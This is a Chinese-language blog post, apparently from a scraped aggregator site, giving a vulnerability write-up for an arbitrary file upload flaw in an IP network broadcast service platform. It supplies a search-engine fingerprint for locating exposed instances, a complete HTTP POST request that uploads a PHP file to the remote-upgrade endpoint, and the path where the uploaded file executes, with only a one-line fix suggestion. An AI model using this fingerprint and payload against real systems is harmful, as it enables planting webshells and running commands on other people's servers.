当前位置: 首页 > news >正文

IP网络广播服务平台任意文件上传漏洞

news 2025/7/18 14:24:37

文章目录

    • 免责声明
    • 搜索语法
    • 漏洞描述
    • 漏洞复现
    • 修复建议

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

icon_hash="-568806419"

漏洞描述

该系统在upload接口处可上传任意文件导致命令执行

漏洞复现

payload

POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: 
User-Agent:Mozilla/4.0(compatible;MSIE8.0;WindowsNT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 184
Content-Type: multipart/form-data;boundary=fd28d43e5403842fb95afb8b8c86e976--fd28d43e5403842fb95afb8b8c86e976
Content-Disposition: form-data;name="file";filename="xxx.php"
Content-Type: application/octet-stream<?php phpinfo() ?>
--fd28d43e5403842fb95afb8b8c86e976--

在这里插入图片描述
回显路径为http://ip/uploads/remote_upgrade/xxx.php
在这里插入图片描述

修复建议

升级到最新版本

http://www.lryc.cn/news/437182.html

相关文章:

  • 详细阐述Activity的生命周期
  • spring boot+vue3学习之旅
  • vue-watch监听功能(侦听器)详解使用
  • 8.第二阶段x86游戏实战2-实现瞬移
  • uts+uniapp踩坑记录(vue3项目
  • 《深度学习》OpenCV 高阶 图像金字塔 用法解析及案例实现
  • dirty pages , swapiness 查看SWAP占用进程
  • Spring Boot项目更改项目名称
  • Hive SQL基础语法及查询实践
  • k8s service如何实现流量转发
  • 每日一练:K个一组翻转链表
  • 昨晚,OpenAI震撼发布o1大模型!我们正式迈入了下一个时代。
  • MySql8.x---开窗函数
  • 图文讲解HarmonyOS应用发布流程
  • 【专题】2024飞行汽车技术全景报告合集PDF分享(附原数据表)
  • 经典负载调制平衡放大器(LMBA)设计-从理论到ADS仿真
  • Web开发:基础Web开发的支持
  • 【LeetCode每日一题】——LCR 168.丑数
  • Day7 | Java框架 | SpringMVC
  • 【网络通信基础与实践第二讲】包括互联网概述、互联网发展的三个阶段、互联网的组成、计算机网络的体系结构
  • CentOS7下安装Ruby3.2.4的实施路径
  • Redis 实现原理或机制
  • 使用程序方式获取与处理MySQL表数据
  • 计算机网络(五) —— 自定义协议简单网络程序
  • 开源模型应用落地-qwen2-7b-instruct-LoRA微调-unsloth(让微调起飞)-单机单卡-V100(十七)
  • [数据集][目标检测]车油口挡板开关闭合检测数据集VOC+YOLO格式138张2类别
  • Delphi 的 RSA 库 LockBox
  • element UI学习使用(1)
  • 如何搞定日语翻译?试试这四款工具
  • 【STM32】独立看门狗(IWDG)原理详解及编程实践(上)